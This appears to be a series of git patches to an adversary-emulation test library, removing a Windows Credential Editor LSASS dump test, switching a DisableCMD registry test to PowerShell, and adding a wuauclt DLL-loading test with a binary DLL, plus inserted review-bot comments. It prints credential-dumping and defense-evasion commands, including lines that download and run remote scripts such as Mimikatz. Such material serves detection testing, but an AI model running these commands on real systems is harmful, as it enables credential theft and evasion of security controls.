createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell +credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt credential-access,T1003.003,NTDS,2,Copy 
NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index acedc648..4471bbbd 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
@@ -83,19 +83,18 @@ - [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md) - Atomic Test #1: Dumping LSA Secrets [windows] - [T1003.001 LSASS Memory](../../T1003.001/T1003.001.md) - - Atomic Test #1: Windows Credential Editor [windows] - - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows] - - Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows] - - Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows] - - Atomic Test #5: Dump LSASS.exe Memory using NanoDump [windows] - - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows] - - Atomic Test #7: Offline Credential Theft With Mimikatz [windows] - - Atomic Test #8: LSASS read with pypykatz [windows] - - Atomic Test #9: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows] - - Atomic Test #10: Create Mini Dump of LSASS.exe using ProcDump [windows] - - Atomic Test #11: Powershell Mimikatz [windows] - - Atomic Test #12: Dump LSASS with .Net 5 createdump.exe [windows] - - Atomic Test #13: Dump LSASS.exe using imported Microsoft DLLs [windows] + - Atomic Test #1: Dump LSASS.exe Memory using ProcDump [windows] + - Atomic Test #2: Dump LSASS.exe Memory using comsvcs.dll [windows] + - Atomic Test #3: Dump LSASS.exe Memory using direct system calls and API unhooking [windows] + - Atomic Test #4: Dump LSASS.exe Memory using NanoDump [windows] + - Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows] + - Atomic Test #6: Offline Credential Theft With Mimikatz [windows] + - Atomic Test #7: LSASS read with pypykatz [windows] + - Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows] + - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows] + - Atomic Test #10: Powershell Mimikatz [windows] + - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows] + - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows] - T1557 Man-in-the-Middle [CONTRIBUTE A 
TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1003.003 NTDS](../../T1003.003/T1003.003.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index b03e5140..ce47d683 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md 
@@ -58,19 +58,18 @@ - [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md) - Atomic Test #1: Dumping LSA Secrets [windows] - [T1003.001 LSASS Memory](../../T1003.001/T1003.001.md) - - Atomic Test #1: Windows Credential Editor [windows] - - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows] - - Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows] - - Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows] - - Atomic Test #5: Dump LSASS.exe Memory using NanoDump [windows] - - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows] - - Atomic Test #7: Offline Credential Theft With Mimikatz [windows] - - Atomic Test #8: LSASS read with pypykatz [windows] - - Atomic Test #9: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows] - - Atomic Test #10: Create Mini Dump of LSASS.exe using ProcDump [windows] - - Atomic Test #11: Powershell Mimikatz [windows] - - Atomic Test #12: Dump LSASS with .Net 5 createdump.exe [windows] - - Atomic Test #13: Dump LSASS.exe using imported Microsoft DLLs [windows] + - Atomic Test #1: Dump LSASS.exe Memory using ProcDump [windows] + - Atomic Test #2: Dump LSASS.exe Memory using comsvcs.dll [windows] + - Atomic Test #3: Dump LSASS.exe Memory using direct system calls and API unhooking [windows] + - Atomic Test #4: Dump LSASS.exe Memory using NanoDump [windows] + - Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows] + - Atomic Test #6: Offline Credential Theft With Mimikatz [windows] + - Atomic Test #7: LSASS read with pypykatz [windows] + - Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows] + - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows] + - Atomic Test #10: Powershell Mimikatz [windows] + - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows] + - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows] - T1557 Man-in-the-Middle [CONTRIBUTE A 
TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1003.003 NTDS](../../T1003.003/T1003.003.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 4a7a7757..6246523d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -3587,57 +3587,6 @@ credential-access: - Ed Williams, Trustwave, SpiderLabs identifier: T1003.001 atomic_tests: - - name: Windows Credential Editor - auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed - description: "Dump user credentials using Windows Credential Editor (supports - Windows XP, 2003, Vista, 7, 2008 and Windows 8 only)\n\nUpon successful execution, - you should see a file with user passwords/hashes at %temp%/wce-output.file.\n\nIf - you see no output it is likely that execution was blocked by Anti-Virus. \n\nIf - you see a message saying \\\"wce.exe is not recognized as an internal or external - command\\\", try using the get-prereq_commands to download and install Windows - Credential Editor first.\n" - supported_platforms: - - windows - input_arguments: - output_file: - description: Path where resulting data should be placed - type: Path - default: "%temp%\\wce-output.txt" - wce_zip_hash: - description: File hash of the Windows Credential Editor zip file - type: String - default: 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933 - wce_exe: - description: Path of Windows Credential Editor executable - type: Path - default: PathToAtomicsFolder\T1003.001\bin\wce.exe - wce_url: - description: Path to download Windows Credential Editor zip file - type: Url - default: https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip - dependency_executor_name: powershell - dependencies: - - description: 'Windows Credential Editor must exist on disk at specified location - (#{wce_exe}) - -' - prereq_command: 'if (Test-Path #{wce_exe}) {exit 0} else {exit 1} - -' - get_prereq_command: | - $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" - [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing) - if(Invoke-WebRequestVerifyHash "#{wce_url}" 
"$zippath" #{wce_zip_hash}){ - Expand-Archive $zippath $parentpath\wce -Force - Move-Item $parentpath\wce\wce.exe "#{wce_exe}" - Remove-Item $zippath, $parentpath\wce -Recurse - } - executor: - command: "#{wce_exe} -o #{output_file}\n" - cleanup_command: del "#{output_file}" >nul 2>&1 - name: command_prompt - elevation_required: true - name: Dump LSASS.exe Memory using ProcDump auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 description: | diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index 1cd19458..c4838e85 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md 
@@ -26,101 +26,34 @@ The following SSPs can be used to access credentials: ## Atomic Tests -- [Atomic Test #1 - Windows Credential Editor](#atomic-test-1---windows-credential-editor) +- [Atomic Test #1 - Dump LSASS.exe Memory using ProcDump](#atomic-test-1---dump-lsassexe-memory-using-procdump) -- [Atomic Test #2 - Dump LSASS.exe Memory using ProcDump](#atomic-test-2---dump-lsassexe-memory-using-procdump) +- [Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-2---dump-lsassexe-memory-using-comsvcsdll) -- [Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-3---dump-lsassexe-memory-using-comsvcsdll) +- [Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-3---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking) -- [Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-4---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking) +- [Atomic Test #4 - Dump LSASS.exe Memory using NanoDump](#atomic-test-4---dump-lsassexe-memory-using-nanodump) -- [Atomic Test #5 - Dump LSASS.exe Memory using NanoDump](#atomic-test-5---dump-lsassexe-memory-using-nanodump) +- [Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-5---dump-lsassexe-memory-using-windows-task-manager) -- [Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-6---dump-lsassexe-memory-using-windows-task-manager) +- [Atomic Test #6 - Offline Credential Theft With Mimikatz](#atomic-test-6---offline-credential-theft-with-mimikatz) -- [Atomic Test #7 - Offline Credential Theft With Mimikatz](#atomic-test-7---offline-credential-theft-with-mimikatz) +- [Atomic Test #7 - LSASS read with pypykatz](#atomic-test-7---lsass-read-with-pypykatz) -- [Atomic Test #8 - LSASS read with pypykatz](#atomic-test-8---lsass-read-with-pypykatz) +- [Atomic Test #8 - Dump LSASS.exe Memory using 
Out-Minidump.ps1](#atomic-test-8---dump-lsassexe-memory-using-out-minidumpps1) -- [Atomic Test #9 - Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-9---dump-lsassexe-memory-using-out-minidumpps1) +- [Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-9---create-mini-dump-of-lsassexe-using-procdump) -- [Atomic Test #10 - Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-10---create-mini-dump-of-lsassexe-using-procdump) +- [Atomic Test #10 - Powershell Mimikatz](#atomic-test-10---powershell-mimikatz) -- [Atomic Test #11 - Powershell Mimikatz](#atomic-test-11---powershell-mimikatz) +- [Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-11---dump-lsass-with-net-5-createdumpexe) -- [Atomic Test #12 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-12---dump-lsass-with-net-5-createdumpexe) - -- [Atomic Test #13 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-13---dump-lsassexe-using-imported-microsoft-dlls) +- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls)
-## Atomic Test #1 - Windows Credential Editor -Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only) - -Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file. - -If you see no output it is likely that execution was blocked by Anti-Virus. - -If you see a message saying \"wce.exe is not recognized as an internal or external command\", try using the get-prereq_commands to download and install Windows Credential Editor first. - -**Supported Platforms:** Windows - - -**auto_generated_guid:** 0f7c5301-6859-45ba-8b4d-1fac30fc31ed - - - - - -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| output_file | Path where resulting data should be placed | Path | %temp%\wce-output.txt| -| wce_zip_hash | File hash of the Windows Credential Editor zip file | String | 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933| -| wce_exe | Path of Windows Credential Editor executable | Path | PathToAtomicsFolder\T1003.001\bin\wce.exe| -| wce_url | Path to download Windows Credential Editor zip file | Url | https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip| - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - - -```cmd -#{wce_exe} -o #{output_file} -``` - -#### Cleanup Commands: -```cmd -del "#{output_file}" >nul 2>&1 -``` - - - -#### Dependencies: Run with `powershell`! 
-##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe}) -##### Check Prereq Commands: -```powershell -if (Test-Path #{wce_exe}) {exit 0} else {exit 1} -``` -##### Get Prereq Commands: -```powershell -$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" -[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing) -if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){ - Expand-Archive $zippath $parentpath\wce -Force - Move-Item $parentpath\wce\wce.exe "#{wce_exe}" - Remove-Item $zippath, $parentpath\wce -Recurse -} -``` - - - - -
-
- -## Atomic Test #2 - Dump LSASS.exe Memory using ProcDump +## Atomic Test #1 - Dump LSASS.exe Memory using ProcDump The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. @@ -179,7 +112,7 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force

-## Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll +## Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dll The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll. Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp. @@ -213,7 +146,7 @@ Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore

-## Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking +## Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. https://github.com/outflanknl/Dumpert https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ @@ -269,7 +202,7 @@ Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c

-## Atomic Test #5 - Dump LSASS.exe Memory using NanoDump +## Atomic Test #4 - Dump LSASS.exe Memory using NanoDump The NanoDump tool uses syscalls and an invalid dump signature to avoid detection. https://github.com/helpsystems/nanodump @@ -318,7 +251,7 @@ Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe0274

-## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager +## Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task Manager and administrative permissions. @@ -352,7 +285,7 @@ Manager and administrative permissions.

-## Atomic Test #7 - Offline Credential Theft With Mimikatz +## Atomic Test #6 - Offline Credential Theft With Mimikatz The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands. @@ -413,7 +346,7 @@ Write-Host "Create the lsass dump manually using the steps in the previous test

-## Atomic Test #8 - LSASS read with pypykatz +## Atomic Test #7 - LSASS read with pypykatz Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa:: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. @@ -478,7 +411,7 @@ pip install pypykatz

-## Atomic Test #9 - Dump LSASS.exe Memory using Out-Minidump.ps1 +## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1 The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp. @@ -513,7 +446,7 @@ Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore

-## Atomic Test #10 - Create Mini Dump of LSASS.exe using ProcDump +## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe @@ -571,7 +504,7 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force

-## Atomic Test #11 - Powershell Mimikatz +## Atomic Test #10 - Powershell Mimikatz Dumps credentials from memory via Powershell by invoking a remote mimikatz script. If Mimikatz runs successfully you will see several usernames and hashes output to the screen. Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. @@ -607,7 +540,7 @@ IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimika

-## Atomic Test #12 - Dump LSASS with .Net 5 createdump.exe +## Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe This test uses the technique describe in this tweet (https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass @@ -662,7 +595,7 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec

-## Atomic Test #13 - Dump LSASS.exe using imported Microsoft DLLs +## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. From e929fa518f860637f5f8cff0bdbefe312cef77fa Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 21 Mar 2022 23:56:59 +0100 Subject: [PATCH 79/83] Fix test 10 (#1823) Co-authored-by: Carrie Roberts --- atomics/T1112/T1112.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml index 25487998..b64f6baf 100644 --- a/atomics/T1112/T1112.yaml +++ b/atomics/T1112/T1112.yaml @@ -179,10 +179,10 @@ atomic_tests: - windows executor: command: | - reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d "1" /f + New-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -Value 1 cleanup_command: | - reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /f >nul 2>&1 - name: command_prompt + Remove-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -ErrorAction Ignore + name: powershell elevation_required: true - name: Disable Windows Task Manager application auto_generated_guid: af254e70-dd0e-4de6-9afe-a994d9ea8b62 From 3259795ba51fef1e55aab4f5d8b7794fc8bf8761 Mon Sep 17 00:00:00 2001 
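Review bot: The new `command:` line `New-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -Value 1` errors with a path-not-found when the `Policies\Microsoft\Windows\System` key does not yet exist and with an already-exists error on a second run, whereas the replaced `reg add` both created the key and overwrote the value. Creating the key first and forcing the write keeps the test idempotent: `New-Item -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Force | Out-Null` followed by `New-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -Value 1 -PropertyType DWord -Force`. Spelling out `-PropertyType DWord` also preserves what the old `/t REG_DWORD` made explicit, so a reader does not have to rely on PowerShell's type inference. The switch of the executor to `powershell` looks deliberate, since a `command_prompt` cleanup would presumably be blocked by the very DisableCMD policy the test sets; a sentence in the test's description (outside this hunk) saying so would stop the next maintainer from switching it back.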
From: CircleCI Atomic Red Team doc generator Date: Mon, 21 Mar 2022 22:57:34 +0000 Subject: [PATCH 80/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 2 +- atomics/Indexes/index.yaml | 10 +++++----- atomics/T1112/T1112.md | 10 +++++----- 4 files changed, 12 insertions(+), 12 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 3e44f2c3..76bc5da5 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -482,7 +482,7 @@ defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to By defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt -defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,command_prompt +defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 42ff77ea..709431ad 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv 
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -312,7 +312,7 @@ defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to By defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt -defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,command_prompt +defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 6246523d..9d1479f9 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -31795,15 +31795,15 @@ defense-evasion: supported_platforms: - windows executor: - command: 'reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" - /v "DisableCMD" /t REG_DWORD /d "1" /f + command: 'New-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" + -Name DisableCMD -Value 1 ' - cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" - /v "DisableCMD" /f >nul 2>&1 + cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" + -Name DisableCMD -ErrorAction Ignore ' - name: command_prompt + name: powershell elevation_required: true - name: Disable Windows Task Manager application auto_generated_guid: af254e70-dd0e-4de6-9afe-a994d9ea8b62 diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md index cbc144da..6469fc2c 100644 --- a/atomics/T1112/T1112.md +++ b/atomics/T1112/T1112.md @@ -434,16 +434,16 @@ See example how Agent Tesla malware abuses this technique: https://any.run/repor -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -```cmd -reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d "1" /f +```powershell +New-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -Value 1 ``` #### Cleanup Commands: -```cmd -reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /f >nul 2>&1 +```powershell +Remove-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System" -Name DisableCMD -ErrorAction Ignore ``` From 86e1badb67e1c4f8808ab3c934713813dbb293f2 Mon Sep 17 00:00:00 2001 
From: Leo Verlod <96517806+Leomon5@users.noreply.github.com> Date: Mon, 21 Mar 2022 18:14:36 -0500 Subject: [PATCH 81/83] Adding T1218 Test 10 - Load DLL with Wuauclt (#1824) * Create bin directory * Add calc.dll * Add Wuauclt dll loading * prereq description wording update Co-authored-by: Carrie Roberts --- atomics/T1218/T1218.yaml | 28 +++++++++++++++++++++++++++- atomics/T1218/bin/calc.dll | Bin 0 -> 10240 bytes 2 files changed, 27 insertions(+), 1 deletion(-) create mode 100644 atomics/T1218/bin/calc.dll diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml index c4141456..41c43533 100644 --- a/atomics/T1218/T1218.yaml +++ b/atomics/T1218/T1218.yaml @@ -255,4 +255,30 @@ atomic_tests: command: | #{dspath} -S #{txt_payload} name: powershell - elevation_required: false \ No newline at end of file + elevation_required: false +- name: Load Arbitrary DLL via Wuauclt (Windows Update Client) + description: | + This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched. + See https://dtm.uk/wuauclt/ + supported_platforms: + - windows + input_arguments: + arbitrary_dll: + description: Path of DLL to be loaded + type: String + default: PathToAtomicsFolder\T1218\bin\calc.dll + dependency_executor_name: powershell + dependencies: + - description: | + DLL to load must exist on disk as specified location (#{arbitrary_dll}) + prereq_command: | + if (test-path "#{arbitrary_dll}"){exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{arbitrary_dll}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true" -OutFile "#{arbitrary_dll}" + executor: + command: | + wuauclt.exe /UpdateDeploymentProvider #{arbitrary_dll} /RunHandlerComServer + cleanup_command: |- + taskkill /f /im calculator.exe > nul 2>&1 + name: command_prompt 
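Review bot: `split-path #{arbitrary_dll}` in `get_prereq_command` and `#{arbitrary_dll}` in the `wuauclt.exe` command are unquoted while the `test-path "#{arbitrary_dll}"` check quotes it, so a path containing a space passes the prereq check and then breaks both the directory creation and the test itself; `New-Item -Type Directory (split-path "#{arbitrary_dll}") -ErrorAction ignore | Out-Null` and `wuauclt.exe /UpdateDeploymentProvider "#{arbitrary_dll}" /RunHandlerComServer` keep the three consistent. The `Invoke-WebRequest` download of calc.dll is not integrity-checked, although the repo's `Invoke-WebRequestVerifyHash` helper with a pinned SHA-256 input argument is used for the same purpose elsewhere in this series; adding a `calc_dll_hash` input and verifying before writing `#{arbitrary_dll}` would tie the test to the exact binary committed in this PR. The new test also omits `elevation_required`, which the preceding test states explicitly (`elevation_required: false`), so the generated docs will not say whether admin rights are needed. Finally, `taskkill /f /im calculator.exe` only handles the launched calculator; if wuauclt.exe stays resident after loading the DLL it is left running, which is worth confirming on a test host and, if so, adding to `cleanup_command`.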
diff --git a/atomics/T1218/bin/calc.dll b/atomics/T1218/bin/calc.dll new file mode 100644 index 0000000000000000000000000000000000000000..b3a8095e593ce0c66de556a1017d04b73955a92e GIT binary patch literal 10240 zcmeHMdvqMtdA}>|tX`H^Hd-PchOxay;vr?N6(C~^uWSjf$O?od8-fk1^=f2ok#@JU zvqmPS$XzS(YPzkHLXM#%HO4fYmZSzlBAfPfWw}TO3`T^54Wt;Fv?Jt`BYX-uvD6o#s1svRuZP9a+~I8w8}}Grs@x=M2PiFFiPyJyURW z;h@cbbYWXpI4;KI=q5SXBZh*JNK_FwN}`;Ih~bFXa7(M$6YY?yii-=~mg|NmJKkkS z3!l#Bf@dFkItTQc$BXux(7C_Bpy%$-H(-Imm;Rw>f39Iy^t1@LdvDHun*j?g_~Fwg zoo~=tK&pTo=r?a*{0)i*n|cuo7@CG`V}v10HK&|*H0&MP7m{;BPHWM$z=@IR7U@p zvMl+&O{t*I`6y8-oGwE96O5h-L0b;s{CUPGwn;rka2$1E&HWkYgF^;+G3v!r8{GLk zrMOFYYO7nUUxxxjuAcU*A9#;wZ^Fs;Orp%2;pzsrhpURamaALc9QI=UUBgT#Z|Wr~}t zquNS{QE-`Gef}UBHK{LiHP^2eSHoew{;Do)xy0(8@r&T$0Q8wAz|BtTsHxbL-9}OI z4Sb*q90uOE`ZM>>pAi!ug(EPmkEVnQ$hB+HI^Vzg;@QSRJ1Du~{JnEUFM!5A)RRqCe#;OSPcC zc>cQEj1KcPsgvp_=(7H?gmal|?*hi|&+}%+C()erDm{6|c26T$g}=Z$#S!Adkp{Pi 